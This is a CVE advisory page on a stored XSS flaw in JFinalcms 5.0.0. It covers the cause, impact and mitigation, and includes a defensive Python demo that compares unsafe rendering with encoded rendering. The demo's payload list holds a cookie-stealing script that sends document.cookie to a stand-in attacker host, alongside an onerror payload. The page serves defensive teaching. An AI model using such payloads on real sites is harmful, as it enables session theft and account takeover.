CVE-2023-50102
Description
JFinalcms 5.0.0 is vulnerable to Cross Site Scripting (XSS).
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
JFinalcms 5.0.0 is vulnerable to stored Cross-Site Scripting (XSS) via the content editing functionality.
Vulnerability description
CVE-2023-50102 identifies a stored Cross-Site Scripting (XSS) vulnerability in JFinalcms version 5.0.0. The root cause is that user-supplied content is neither filtered when it is saved nor HTML-encoded when it is rendered, so malicious markup persisted in the database is later executed in the browser of any user who views the affected content.[2][3]
Exploitation vector
An attacker who can edit content (a user with admin or editor privileges) can place arbitrary HTML or JavaScript in the content field. Because the input is not filtered or encoded before storage, the payload is saved as-is and later rendered without escaping when the content page is loaded. The attack therefore fires when a victim simply visits the affected page; no crafted link or attachment is needed. Exploitation does require an authenticated account with content-editing rights, so the realistic scenario is a lower-privileged editor targeting administrators and other users who view the page.[3]
Impact
Successful exploitation allows an attacker to execute arbitrary scripts in the context of the victim's browser session. This can lead to session token theft, account takeover, defacement of the site, or redirection to malicious sites. Since the payload is stored, every user who accesses the compromised content is at risk, making the impact broad and persistent until the injected data is removed.[2][3]
Mitigation
The official description covers only JFinalcms 5.0.0. The GitHub page cited in [1] belongs to the JFinal web framework rather than to the CMS; its latest framework release, 5.2.7, is not a fix for this issue, and no patch or advisory for the CMS itself has been published. Note that the advisory's package entry in the Affected packages table likewise names the framework artifact com.jfinal:jfinal, so dependency scanners keyed on that Maven coordinate will flag the framework, not JFinalcms installations. Until a fixed release exists, the only workaround is to HTML-encode all user-supplied content at output time in every template that renders it, and, where editors legitimately need rich text, to sanitize the stored content against an allowlist of tags and attributes rather than trusting it as-is.
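The store-then-render pattern described in the vulnerability and exploitation sections above, beside the output-encoding mitigation, as an added example. This is not JFinalcms code (JFinalcms is a Java/JFinal application; the pattern is language-neutral and is shown here in Python): the in-memory ContentStore, the page template, the two payloads and the find_active_content check are all constructed for this illustration and assume nothing about the CMS's real schema or templates.

```python
"""Stored-XSS model for the content-editing flaw described above (CVE-2023-50102).

Added illustration, not JFinalcms code: a tiny in-memory "CMS" persists a
content field verbatim (as the advisory text describes) and renders it once
without encoding and once with HTML output encoding. All names are
hypothetical; the payloads are constructed for the example.
"""
import html
from html.parser import HTMLParser


class ContentStore:
    """Stand-in for the CMS database: stores the content field unchanged."""

    def __init__(self):
        self._rows = {}

    def save(self, page_id, body):
        # The vulnerable behaviour: no filtering on write. Encoding on read is
        # what decides whether the stored markup reaches the browser as code.
        self._rows[page_id] = body

    def load(self, page_id):
        return self._rows[page_id]


TEMPLATE = "<html><body><article>{body}</article></body></html>"


def render_unsafe(store, page_id):
    """Vulnerable pattern: stored body interpolated into the page as raw HTML."""
    return TEMPLATE.format(body=store.load(page_id))


def render_encoded(store, page_id):
    """Hardened pattern: HTML-encode at output time, whatever was stored."""
    return TEMPLATE.format(body=html.escape(store.load(page_id), quote=True))


class ActiveContentFinder(HTMLParser):
    """Records markup a browser would execute: script-bearing tags, on* handlers,
    javascript: URLs. Encoded text produces no start tags, so it yields nothing."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag in {"script", "iframe", "object", "embed", "svg"}:
            self.findings.append(f"<{tag}>")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"<{tag} {name}>")
            elif name in {"href", "src", "action"} and value and \
                    value.strip().lower().startswith("javascript:"):
                self.findings.append(f"<{tag} {name}=javascript:>")


def find_active_content(page_html):
    """Return the executable constructs found in a rendered page ([] if none)."""
    finder = ActiveContentFinder()
    finder.feed(page_html)
    finder.close()
    return finder.findings


# Constructed payloads of the kind an editor-level account could submit.
PAYLOADS = [
    '<script>document.location="https://attacker.example/?c="+document.cookie</script>',
    '<img src=x onerror="alert(document.domain)">',
]


def demo():
    """Persist a malicious page body once, render it both ways, compare."""
    store = ContentStore()
    store.save("about", "Welcome to the site.<br>" + "".join(PAYLOADS))
    unsafe_page = render_unsafe(store, "about")
    encoded_page = render_encoded(store, "about")
    return {
        "unsafe_findings": find_active_content(unsafe_page),    # ['<script>', '<img onerror>']
        "encoded_findings": find_active_content(encoded_page),  # []
        "encoded_page": encoded_page,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The encoded output also makes the trade-off visible: html.escape neutralises the harmless `<br>` along with the payloads, so a CMS whose editors legitimately need rich text cannot rely on blanket output encoding alone and needs an allowlist HTML sanitizer on the stored body as well. The example also shows why "sanitize on write" without encoding on read is fragile: anything that reaches the store unfiltered, by any path, is rendered as code.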
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| com.jfinal:jfinal (Maven) | <= 5.0.0 | — |
Affected products (2)
- JFinalcms/JFinalcms
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (3)
News mentions (0)
No linked articles in our index yet.